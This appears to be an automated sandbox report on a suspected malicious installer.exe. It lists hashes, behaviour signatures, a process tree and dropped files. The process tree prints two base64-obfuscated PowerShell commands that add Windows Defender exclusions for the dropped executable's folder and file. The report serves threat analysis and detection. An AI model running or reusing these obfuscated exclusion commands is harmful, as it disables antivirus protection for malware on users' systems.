Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-10-2024 13:57
Static task
static1
Behavioral task
behavioral1
Sample
installer.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
installer.exe
Resource
win10v2004-20241007-en
General
-
Target
installer.exe
-
Size
18.7MB
-
MD5
9cd846ea50a04e3d926b8adbfdcb9dff
-
SHA1
1c2d7e2e672e8aa64853f8a2b6b0ff7e97117465
-
SHA256
156cc4ef32137f0f9a8df03c32c1b0b506c72355c08bbf6f8c07279a53a7922b
-
SHA512
1b60385c3df8a331f3824954532262d63c7218459e1d7241b37c652520510e68d300d620b31f74492942a705434c740f336c44482ddebc1c04db60e4b50a933f
-
SSDEEP
98304:eI0CniMX77777773773W/lcCjQI7wnHsv8pMCTzSAhmyhJONL+L8JCE8fh9mdJOW:Nii77777773773WICRPZQ2isH
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2860 efxtdslsxmliheae.exe -
Loads dropped DLL 6 IoCs
pid Process 1732 installer.exe 1732 installer.exe 2432 WerFault.exe 2432 WerFault.exe 2432 WerFault.exe 2432 WerFault.exe -
pid Process 2540 powershell.exe 3004 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2540 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1732 wrote to memory of 2540 1732 installer.exe 32 PID 1732 wrote to memory of 2540 1732 installer.exe 32 PID 1732 wrote to memory of 2540 1732 installer.exe 32 PID 1732 wrote to memory of 3004 1732 installer.exe 34 PID 1732 wrote to memory of 3004 1732 installer.exe 34 PID 1732 wrote to memory of 3004 1732 installer.exe 34 PID 1732 wrote to memory of 2860 1732 installer.exe 36 PID 1732 wrote to memory of 2860 1732 installer.exe 36 PID 1732 wrote to memory of 2860 1732 installer.exe 36 PID 2860 wrote to memory of 2432 2860 efxtdslsxmliheae.exe 37 PID 2860 wrote to memory of 2432 2860 efxtdslsxmliheae.exe 37 PID 2860 wrote to memory of 2432 2860 efxtdslsxmliheae.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cYnp1Znhod3psaHZqcWVncCI=')); Invoke-Expression $cmd"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cYnp1Znhod3psaHZqcWVncFxlZnh0ZHNsc3htbGloZWFlLmV4ZSI=')); Invoke-Expression $cmd"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Users\Admin\bzufxhwzlhvjqegp\efxtdslsxmliheae.exe"C:\Users\Admin\bzufxhwzlhvjqegp\efxtdslsxmliheae.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2860 -s 283⤵
- Loads dropped DLL
PID:2432
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DU9WGWIQE9R4N3ECJTQB.temp
Filesize7KB
MD561a5736e4a4115216ef62b443b2a530a
SHA1b27c397274f70145a0cf85adb99203999fed66ef
SHA256cfe537960eec1a5ccf28fbe7282dd4993b800643c7505b4e819a2692869351f7
SHA512c580ccdc6f32be38f7eb98e084d954670172994e456a04a32336dbc1657477b44042064e7a24c1d0ec4ab9f623d2d4cb2fc0001f84f34ae6567ce95d00064f24
-
Filesize
2.6MB
MD598e56fc6276f5ea11ed37de5b40116d3
SHA1882fd2c385eeaffec3881b3262de638ff912f276
SHA2569006378885c4a84699ad0f90dbe7579969e3a1b41f6fd334c4e440d30a15d063
SHA512978c3f3e5e866db2cc59a3474a6b75291b3eba44d445887c2afd50218dce776a650822eb67118481e62411b02102c7e49a1dc99db507d4cca59d0253b5b1a19b